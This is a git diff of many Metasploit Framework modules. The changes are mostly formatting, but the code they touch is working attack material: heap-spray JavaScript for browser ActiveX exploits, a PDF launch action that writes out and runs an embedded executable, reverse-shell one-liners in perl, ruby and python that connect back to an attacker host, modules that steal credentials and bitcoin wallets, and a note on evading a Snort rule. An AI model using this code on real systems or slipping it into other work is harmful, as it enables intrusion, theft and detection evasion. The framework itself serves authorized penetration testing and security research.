'mr_me <steventhomasseeley[at]gmail.com>', # metasploit module
'Dr_IDE' # original Exploit from exploit-db.com
],
],
'Version' => '$Revision$',
'References' =>
[
modules/exploits/windows/browser/pcvue_func.rb
+32 -32
View File
@@ -103,29 +103,29 @@ class Metasploit3 < Msf::Exploit::Remote
j_counter = rand_text_alpha(rand(30) + 2)
j_txt = rand_text_alpha(rand(8) + 4)
js = <<-EOF
var #{j_shellcode} = unescape('#{shellcode}');
var #{j_nops} = unescape("#{nops}");
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while(#{j_nops}.length < #{j_slackspace}) {
#{j_nops} += #{j_nops};
}
var #{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace});
var #{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace});
while((#{j_block}.length + #{j_slackspace}) < #{blocksize}) {
#{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
}
js = <<-EOS
var #{j_shellcode} = unescape('#{shellcode}');
var #{j_nops} = unescape("#{nops}");
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while(#{j_nops}.length < #{j_slackspace}) {
#{j_nops} += #{j_nops};
}
var #{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace});
var #{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace});
while((#{j_block}.length + #{j_slackspace}) < #{blocksize}) {
#{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
}
#{j_memory} = new Array();
for(#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++){
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode} ;
}
#{j_memory} = new Array();
for(#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++){
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode} ;
}
function main(){
#{obj_name}.SaveObject("#{j_txt}.txt", #{ret}, 0);
}
EOF
function main(){
#{obj_name}.SaveObject("#{j_txt}.txt", #{ret}, 0);
}
EOS
js = js.gsub(/^\t\t/, '')
@@ -138,17 +138,17 @@ class Metasploit3 < Msf::Exploit::Remote
main_sym = "main"
end
content = <<-EOF
<html>
<body>
<object classid='clsid:2BBD45A5-28AE-11D1-ACAC-0800170967D9' id='#{obj_name}' ></object>
<script language='javascript'>
#{js}
#{main_sym}();
</script>
</body>
</html>
EOF
content = <<-EOS
<html>
<body>
<object classid='clsid:2BBD45A5-28AE-11D1-ACAC-0800170967D9' id='#{obj_name}' ></object>
<script language='javascript'>
#{js}
#{main_sym}();
</script>
</body>
</html>
EOS
#Remove the extra tabs from content
content = content.gsub(/^\t\t/, '')
modules/exploits/windows/browser/teechart_pro.rb
+23 -23
View File
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
# twitter.com/net__ninja
'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery/msf module
'sinn3r', #Auto target, obfuscation, lots of testing
],
],
'Version' => '$Revision$',
'References' =>
[
@@ -148,30 +148,30 @@ class Metasploit3 < Msf::Exploit::Remote
main_sym = 'main' #main function name
if my_target.name =~ /IE6/ or my_target.name =~ /IE7/
js = <<-EOF
var sc = unescape('#{sc}');
js = <<-EOS
var sc = unescape('#{sc}');
var nops = unescape('%u0c0c%u0c0c');
var offset = 20;
var s = offset + sc.length;
while(nops.length < s) {
nops += nops;
}
var chunk1 = nops.substring(0, s);
var chunk2 = nops.substring(0, nops.length - s);
while((chunk2.length + s) < 0x50000) {
chunk2 = chunk2 + chunk2 + chunk1;
}
var blocks = new Array();
for(var counter=0; counter<200; counter++){
blocks[counter] = chunk2 + sc;
}
var nops = unescape('%u0c0c%u0c0c');
var offset = 20;
var s = offset + sc.length;
while(nops.length < s) {
nops += nops;
}
var chunk1 = nops.substring(0, s);
var chunk2 = nops.substring(0, nops.length - s);
while((chunk2.length + s) < 0x50000) {
chunk2 = chunk2 + chunk2 + chunk1;
}
var blocks = new Array();
for(var counter=0; counter<200; counter++){
blocks[counter] = chunk2 + sc;
}
function main()
{
#{obj_name}.AddSeries(#{my_target.ret});
}
EOF
function main()
{
#{obj_name}.AddSeries(#{my_target.ret});
}
EOS
end
#http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf
modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
+3 -2
View File
@@ -372,8 +372,9 @@ class Metasploit3 < Msf::Exploit::Remote
def create_email_body_html(body, subject)
body = body.gsub(/\\[nr]/, "<BR>\n")
body = body.gsub(/\\t/, "&nbsp;&nbsp;&nbsp;")
body = "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=3D\"Content-Type\" CONTENT=3D\"text/html; charset=3Diso-8859-=\n1\">\n<TITLE>" << subject << "</TITLE>\n</HEAD>\n<BODY>\n" << body << "\n<BR><BR>\n</BODY>\n</HTML>"
return body
ret = "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=3D\"Content-Type\" CONTENT=3D\"text/html; charset=3Diso-8859-=\n1\">\n"
ret << "<TITLE>" << subject << "</TITLE>\n</HEAD>\n<BODY>\n" << body << "\n<BR><BR>\n</BODY>\n</HTML>"
ret
end
def create_tnef_exploit
modules/exploits/windows/fileformat/adobe_libtiff.rb
+3 -2
View File
@@ -324,7 +324,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def make_xml(tiff_data)
xml_data = %Q|<?xml version="1.0" encoding="UTF-8" ?>
xml_data = <<-EOS
<?xml version="1.0" encoding="UTF-8" ?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
<present>
@@ -383,7 +384,7 @@ class Metasploit3 < Msf::Exploit::Remote
</subform>
</form>
</xdp:xdp>
|
EOS
xml_data.gsub!(/REPLACE_TIFF/, tiff_data)
xml_data
modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
+2 -2
View File
@@ -108,8 +108,8 @@ class Metasploit3 < Msf::Exploit::Remote
output = String.new()
output << "#{obj_num.to_i + 1} 0 obj\r<</UF(#{pdf_name}.pdf)/F(#{pdf_name}.pdf)/EF<</F #{obj_num.to_i + 2} 0 R>>/Desc(#{pdf_name})/Type/Filespec>>\rendobj\r"
output << "#{obj_num.to_i + 2} 0 obj\r<</Subtype/application#2Fpdf/Length #{stream.length + 3}/Filter/FlateDecode/DL #{file_size}/Params<</Size #{file_size}/CheckSum<#{md5.upcase}>>>>>stream\r#{stream}\r\nendstream\rendobj\r"
output << "#{obj_num.to_i + 2} 0 obj\r<</Subtype/application#2Fpdf/Length #{stream.length + 3}/Filter/FlateDecode/DL #{file_size}/Params<</Size #{file_size}/CheckSum<#{md5.upcase}>>>>>"
output << "stream\r#{stream}\r\nendstream\rendobj\r"
return output
end
modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb
+2 -1
View File
@@ -152,7 +152,8 @@ class Metasploit3 < Msf::Exploit::Remote
xref << pdf.length
pdf << ioDef(5) << nObfu("<</Type/Action/S/Launch/Win ") << "<< "
pdf << "/F (cmd.exe) /P (/C echo Set o=CreateObject^(\"Scripting.FileSystemObject\"^):Set f=o.OpenTextFile^(\"#{file_name}\",1,True^):"
pdf << "f.SkipLine:Set w=CreateObject^(\"WScript.Shell\"^):Set g=o.OpenTextFile^(w.ExpandEnvironmentStrings^(\"%TEMP%\"^)+\"\\\\#{exe_name}\",2,True^):a=Split^(Trim^(Replace^(f.ReadLine,\"\\\\x\",\" \"^)^)^):"
pdf << "f.SkipLine:Set w=CreateObject^(\"WScript.Shell\"^):Set g=o.OpenTextFile^(w.ExpandEnvironmentStrings^(\"%TEMP%\"^)+\"\\\\#{exe_name}\",2,True^):"
pdf << "a=Split^(Trim^(Replace^(f.ReadLine,\"\\\\x\",\" \"^)^)^):"
pdf << "for each x in a:g.Write^(Chr^(\"&h\" ^& x^)^):next:g.Close:f.Close > 1.vbs && cscript //B 1.vbs && start %TEMP%\\\\#{exe_name} && del /F 1.vbs"
pdf << eol << eol << eol << "#{launch_msg})"
pdf << ">>>>" << endobj
modules/exploits/windows/fileformat/deepburner_path.rb
+2 -2
View File
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
template = <<-EOF
template = <<-EOS
<DeepBurner_record ver="1.9.0.228" type="data">
<data_cd ver="1" device="" session2import="0" finalize_disc="0" finalize_track="1" bootable="0" boot_image_path="">
<dir name="CDRoot" imp="0">
@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
<exitbutton name="ButtonExit" image_path="" image_down_path="" text="Exit" hint="Exit this program" left="120" top="96" width="75" height="25" fontname="MS Sans Serif" fontsize="8" fontcolor="255" visible="1" fontstyle="0" />
</autorun>
</DeepBurner_record>
EOF
EOS
seh_offset = 272
path = make_nops(seh_offset)
modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb
Executable → Regular
View File
modules/exploits/windows/fileformat/ezip_wizard_bof.rb
+7 -7
View File
@@ -49,8 +49,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://www.exploit-db.com/exploits/8180' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12059/' ],
],
'Platform' => [ 'win' ],
'Payload' =>
'Platform' => [ 'win' ],
'Payload' =>
{
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
},
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0))
register_options(
[
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
OptString.new('USERNAME', [ true, 'Username', ''])
], self.class)
@@ -83,10 +83,10 @@ class Metasploit3 < Msf::Exploit::Remote
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
[ 'x86/alpha_mixed'].each { |name|
enc = framework.encoders.create(name)
if name =~/alpha/
enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
end
enc = framework.encoders.create(name)
if name =~/alpha/
enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
end
hunter = enc.encode(hunter, nil, nil, platform)
}
modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
+1 -1
View File
@@ -106,5 +106,5 @@ createDataObject\('#{path_new + decoder_file + '.bat'}', unescape\(\"#{decoder}\
decoder.gsub!(/decode_stub/, "C:/Windows/Temp/" + decoder_file + '.vbs')
return decoder = Rex::Text.uri_encode(decoder)
end
end
end
modules/exploits/windows/fileformat/scadaphone_zip.rb
+5 -6
View File
@@ -43,8 +43,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://www.scadatec.com/' ],
[ 'URL', 'http://www.exploit-db.com/exploits/17817/' ],
],
'Platform' => [ 'win' ],
'Payload' =>
'Platform' => [ 'win' ],
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00\x0a\x0d",
@@ -59,10 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
], self.class)
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
], self.class)
end
def exploit
modules/exploits/windows/http/hp_nnm_ovas.rb
+4 -3
View File
@@ -9,11 +9,11 @@
# http://metasploit.com/framework/
##
##
=begin
# This should bypass the following snort rule referenced from web-misc.rules (10/17/2008)
# alert tcp $EXTERNAL_NET any -> $HOME_NET 7510 (msg:"WEB-MISC HP OpenView Network Node Manager HTTP handling buffer overflow attempt"; flow:to_server,established; content:"GET "; depth:4; nocase; isdataat:165,relative; content:"/topology/homeBaseView"; pcre:"/GET\s+\w[^\x0a\x20]{165}/i"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,28569; reference:cve,2008-1697; classtype:attempted-admin; sid:13715; rev:3;)
# Newer versions of this rule might find this but we've taken steps to atleast bypass this rule
##
=end
require 'msf/core'
@@ -94,7 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(7510),
OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ])
OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request",
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ])
], self.class)
end
modules/exploits/windows/http/hp_power_manager_filename.rb
+1 -1
View File
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
which may result aribitrary remote code execution under the context of 'SYSTEM'.
},
'License' => MSF_LICENSE,
'Author' =>
'Author' =>
[
# Original discovery (Secunia Research)
'Alin Rad Pop',
modules/exploits/windows/http/osb_uname_jlist.rb
+1
View File
@@ -117,6 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
__END__
else if (strcmp($type, "Job") == 0)
{
modules/exploits/windows/misc/wireshark_packet_dect.rb
+1 -2
View File
@@ -166,9 +166,8 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending malicious packet")
open_pcap()
#handler
#handler
if datastore['LOOP']
while true
break if session_created? and datastore['ExitOnSession']
modules/payloads/singles/linux/armle/adduser.rb
Executable → Regular
+4
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
modules/payloads/singles/linux/x64/exec.rb
+12
View File
@@ -1,3 +1,15 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
module Metasploit3
modules/payloads/singles/linux/x64/shell_bind_tcp.rb
+12
View File
@@ -1,3 +1,15 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
modules/payloads/singles/linux/x64/shell_reverse_tcp.rb
+12
View File
@@ -1,3 +1,15 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
modules/payloads/singles/windows/exec.rb
+1
View File
@@ -19,6 +19,7 @@ require 'msf/core/payload/windows/exec'
###
module Metasploit3
# $Revision$
include Msf::Payload::Windows::Exec
end
modules/payloads/singles/windows/loadlibrary.rb
+1
View File
@@ -19,6 +19,7 @@ require 'msf/core/payload/windows/loadlibrary'
###
module Metasploit3
# $Revision$
include Msf::Payload::Windows::LoadLibrary
end
modules/payloads/stagers/java/reverse_https.rb
+1 -1
View File
@@ -20,7 +20,7 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
'Name' => 'Java Reverse HTTPS Stager',
'Version' => '$Revision: 13402 $',
'Version' => '$Revision$',
'Description' => 'Tunnel communication over HTTPS',
'Author' => [
'mihi', # all the hard work
modules/payloads/stagers/linux/x64/bind_tcp.rb
+12
View File
@@ -1,3 +1,15 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
modules/payloads/stagers/linux/x64/reverse_tcp.rb
+12
View File
@@ -1,3 +1,15 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
modules/payloads/stages/linux/x64/shell.rb
+12
View File
@@ -1,3 +1,15 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
modules/payloads/stages/osx/x86/bundleinject.rb
+1
View File
@@ -19,6 +19,7 @@ require 'msf/core/payload/osx/bundleinject'
###
module Metasploit3
# $Revision$
include Msf::Payload::Osx::BundleInject
end
modules/payloads/stages/windows/dllinject.rb
+1
View File
@@ -21,6 +21,7 @@ require 'msf/core/payload/windows/reflectivedllinject'
###
module Metasploit3
# $Revision$
include Msf::Payload::Windows::ReflectiveDllInject
end
modules/payloads/stages/windows/patchupdllinject.rb
+1
View File
@@ -19,6 +19,7 @@ require 'msf/core/payload/windows/dllinject'
###
module Metasploit3
# $Revision$
include Msf::Payload::Windows::DllInject
end
modules/post/multi/gather/dns_bruteforce.rb
+4 -4
View File
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Multi Gather DNS Forward Lookup Bruteforce',
'Description' => %q{
'Description' => %q{
Brute force subdomains and hostnames via wordlist.
},
'License' => MSF_LICENSE,
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
# Run Method for when run command is issued
def run
domain = datastore['DOMAIN']
hostlst = datastore['NAMELIST']
i, a = 0, []
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Post
ns_opt = " #{n.strip}.#{domain}"
cmd = "/usr/bin/host"
end
if i <= thread_num
print_status("Trying #{ns_opt}")
a.push(::Thread.new {
@@ -126,4 +126,4 @@ class Metasploit3 < Msf::Post
end
end
end
end
end
modules/post/multi/gather/dns_srv_lookup.rb
+19 -19
View File
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Multi Gather DNS Service Record Lookup Scan',
'Description' => %q{
'Description' => %q{
Enumerates know SRV Records for a given domaon using target host DNS query tool.
},
'License' => MSF_LICENSE,
@@ -42,21 +42,21 @@ class Metasploit3 < Msf::Post
# Run Method for when run command is issued
def run
srvrcd = [
'_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.',
'_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.',
'_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.',
'_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.',
'_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.',
'_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.',
'_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.',
'_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.',
'_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.',
'_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.',
'_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.',
'_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.',
'_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.',
'_ldap._tcp.ForestDNSZones.'
]
'_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.',
'_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.',
'_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.',
'_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.',
'_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.',
'_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.',
'_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.',
'_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.',
'_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.',
'_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.',
'_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.',
'_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.',
'_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.',
'_ldap._tcp.ForestDNSZones.'
]
domain = datastore['DOMAIN']
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Post
ip_map[host.strip] = ip.strip
end
end
# Get SRV parameter for each record
records.each do |r|
if r =~ /svr hostname/
@@ -158,7 +158,7 @@ class Metasploit3 < Msf::Post
srv_records << rcrd
end
else
rcrd[:ip] = ip_map[rcrd[:target]]
# Report hosts found
report_host(:host => rcrd[:ip].strip, :name => rcrd[:target])
@@ -258,4 +258,4 @@ class Metasploit3 < Msf::Post
end
return srv_records
end
end
end
modules/post/multi/gather/ping_sweep.rb
+3 -3
View File
@@ -49,9 +49,9 @@ class Metasploit3 < Msf::Post
numip = ipadd.num_ips
while (iplst.length < numip)
ipa = ipadd.next_ip
if (not ipa)
break
end
if (not ipa)
break
end
iplst << ipa
end
if session.type =~ /shell/
modules/post/multi/manage/system_session.rb
+11 -11
View File
@@ -43,8 +43,8 @@ class Metasploit3 < Msf::Post
[false, 'Port for Payload to connect to.', 4433]),
OptBool.new('HANDLER',
[ true, 'Start an Exploit Multi Handler to receive the connection', false]),
OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell',\
'auto', ['auto','ruby','python','perl','bash']])
OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell',
'auto', ['auto','ruby','python','perl','bash']])
], self.class)
end
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
lport = datastore['LPORT']
cmd = ""
case datastore['type']
when /auto/i
when /auto/i
cmd = auto_create_session(lhost,lport)
when /ruby/i
cmd = ruby_session(lhost,lport)
@@ -153,8 +153,8 @@ class Metasploit3 < Msf::Post
def perl_session(lhost,lport)
if cmd_exec("perl -v") =~ /Larry/
print_status("Perl reverse shell selected")
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET \
(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " +
"(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
else
print_error("No scripting environment found for the selected type.")
cmd =""
@@ -166,8 +166,8 @@ class Metasploit3 < Msf::Post
def ruby_session(lhost,lport)
if cmd_exec("ruby -v") =~ /revision/i
print_status("Ruby reverse shell selected")
return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");\
while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" +
"while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
else
print_error("No scripting environment found for the selected type.")
cmd =""
@@ -179,9 +179,9 @@ while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'
def python_session(lhost,lport)
if cmd_exec("python -V") =~ /Python 2\.(\d)/
print_status("Python reverse shell selected")
return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,\
socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);\
os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," +
"socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" +
"os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
else
print_error("No scripting environment found for the selected type.")
cmd =""
@@ -200,4 +200,4 @@ os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
end
return cmd
end
end
end
modules/post/windows/gather/arp_scanner.rb
+1 -7
View File
@@ -68,13 +68,7 @@ class Metasploit3 < Msf::Post
ip = h["return"]
h = iphlp.SendARP(ip,0,6,6)
if h["return"] == client.railgun.const("NO_ERROR")
mac = h["pMacAddr"]
mac_text = mac[0].ord.to_s(16) + ":" +
mac[1].ord.to_s(16) + ":" +
mac[2].ord.to_s(16) + ":" +
mac[3].ord.to_s(16) + ":" +
mac[4].ord.to_s(16) + ":" +
mac[5].ord.to_s(16)
mac_text = h["pMacAddr"].unpack('C*').map { |e| "%02x" % e }.join(':')
print_status("\tIP: #{ip_text} MAC #{mac_text}")
report_host(:host => ip_text,:mac => mac_text)
end
modules/post/windows/gather/bitcoin_jacker.rb
Executable → Regular
+1 -1
View File
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Post
wallet = session.fs.file.new(filename, "rb")
until wallet.eof?
data << wallet.read
end
end
store_loot("bitcoin.wallet", "application/octet-stream", session, data, filename, "Bitcoin Wallet")
print_status(" Wallet Jacked.")
modules/post/windows/gather/cachedump.rb
+1 -1
View File
@@ -328,7 +328,7 @@ class Metasploit3 < Msf::Post
hash.unpack("H*")[0],
logonDomainName,
dnsDomainName,
last.strftime("%F %T"),
last.strftime("%F %T"),
upn,
effectiveName,
fullName,
modules/post/windows/gather/credentials/enum_cred_store.rb
+6 -6
View File
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Post
'Description' => %q{
This module will enumerate the Microsoft Credential Store and decrypt the
credentials. This module can only access credentials created by the user the
process is running as. It cannot decrypt Domain Network Passwords, but will
process is running as. It cannot decrypt Domain Network Passwords, but will
display the username and location.
},
'License' => MSF_LICENSE,
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post
end
return str_data || "Error Decrypting"
end
def decrypt_blob(daddr, dlen, type)
#type 0 = passport cred, type 1 = wininet cred
#set up entropy
@@ -112,7 +112,7 @@ class Metasploit3 < Msf::Post
def gethost(hostorip)
#check for valid ip and return if it is
return hostorip if Rex::Socket.dotted_ip?(hostorip)
return hostorip if Rex::Socket.dotted_ip?(hostorip)
#convert hostname to ip and return it
hostip = nil
@@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post
ip_add= gethost(host)
unless ip_add.nil?
unless ip_add.nil?
auth = {
:host => ip_add,
:port => port,
@@ -185,10 +185,10 @@ class Metasploit3 < Msf::Post
#call credenumerate to get the ptr needed
adv32 = session.railgun.advapi32
ret = adv32.CredEnumerateA(nil,0,4,4)
p_to_arr = ret["Credentials"].unpack("V")
p_to_arr = ret["Credentials"].unpack("V")
arr_len = ret["Count"] * 4 if is_86
arr_len = ret["Count"] * 8 unless is_86
#tell user what's going on
print_status("#{ret["Count"]} credentials found in the Credential Store")
if ret["Count"] > 0
modules/post/windows/gather/credentials/filezilla_server.rb
+4 -2
View File
@@ -140,8 +140,10 @@ class Metasploit3 < Msf::Post
end
file.close
creds, perms, config = parse_server(fs_xml) # user credentials password is just an MD5 hash
# admin pass is just plain text. Priorities?
# user credentials password is just an MD5 hash
# admin pass is just plain text. Priorities?
creds, perms, config = parse_server(fs_xml)
creds.each do |cred|
credentials << [cred['host'], cred['port'], cred['user'], cred['password'], cred['ssl']]
modules/post/windows/gather/credentials/outlook.rb
+36 -30
View File
@@ -82,21 +82,27 @@ class Metasploit3 < Msf::Post
return decrypted_pw
end
# Just a wrapper to avoid copy pasta and long lines
def get_valdata(k, name)
key_base = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
registry_getvaldata("#{key_base}\\#{k}", name)
end
def get_registry
#Determine if saved accounts exist within Outlook. Ignore the Address Book and Personal Folder registry entries.
outlook_exists = 0
saved_accounts = 0
next_account_id = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\", 'NextAccountID')
next_account_id = get_valdata("", 'NextAccountID')
if next_account_id != nil
#Microsoft Outlook not found
print_status "Microsoft Outlook found in Registry..."
outlook_exists = 1
registry_enumkeys("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\").each do |k|
display_name = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Display Name')
registry_enumkeys(key_base + "9375CFF0413111d3B88A00104B2A6676\\").each do |k|
display_name = get_valdata(k, 'Display Name')
if display_name == nil
#Microsoft Outlook found, but no account data saved in this location
@@ -106,17 +112,17 @@ class Metasploit3 < Msf::Post
#Account found - parse through registry data to determine account type. Parse remaining registry data after to speed up module.
saved_accounts = 1
got_user_pw = 0
accountname = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Account Name')
